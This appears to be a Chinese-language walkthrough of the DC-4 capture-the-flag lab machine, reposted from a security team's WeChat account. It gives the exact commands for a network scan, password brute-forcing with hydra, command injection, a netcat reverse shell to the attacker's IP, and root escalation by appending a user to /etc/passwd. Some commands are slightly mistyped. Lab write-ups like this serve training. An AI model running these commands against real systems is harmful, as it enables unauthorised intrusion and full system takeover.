1.环境准备
2.局域网扫描
Nmap -sP 192.168.94.0/24
存活主机如下
目标ip 为192.168.94.161
3.进行服务探测
发现开启了http服务访问其网站
一个登陆框,用admin登陆未报错
账号为admin
进行密码爆破,br得到happy登录
4.漏洞利用
发现可以命令执行的位置
有可用命令
观察到目录下的其他文件
但是没有任何可以利用的地方,突然想到可不可以改前端代码,来实现命令执行
发现改包提交参数可以实现命令执行
Whoami命令执行成功
想一想可以插入shell进行进行反弹
反弹成功rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.94.130 4444 > /tmp/f;
5.提权
我们先利用python
Python -c “import pty;pty.spawn(‘/bin/bash’)”
就成功进入靶机内啦
但是没有发现其他什么但是找到了一个密码本
猜想可能是爆破:保存密码本到kali用hydra去进行ssh爆破
hydra -L /dc4.user -P /dc4.pass -vV -t 10 -o dc4 192.168.94.161 ssh -s 22
成功ssh连进来
我们在/var/mail目录下发现了passwd(Password is: ^xHhA&hvim0y)
提示说
I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.
Password is: ^xHhA&hvim0y
See ya,
Charles
采用charles账户登陆
成功登陆进来
想想有什么提权的办法
Sudo命令是一个突破口
使用sudo -l 查看
有一个teehee的追加命令想有没有有可能追加到用户
perl -le 'print crypt("123456","aa:)
然后用echo
echo "good:aaAN1ZUwjW7to:0:0:::/bin/bash" | sudo teehee -a /etc/passwd
good用户
不确定密码
Cat一下
发现ok
直接ok to flag.txt welldone
其余7个会持续发文的~
大家记得关注收藏,以免走丢
资源链接:https://pan.baidu.com/s/13ra2u5QjCDRewN_RiTfS_Q提取码:seri
往期精选
围观
丨更多
热文
丨更多
·end·
—如果喜欢,快分享给你的朋友们吧—
我们一起愉快的玩耍吧
原文始发于微信公众号(Rot5pider安全团队):九种DC靶机渗透测试四(附靶机下载地址)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论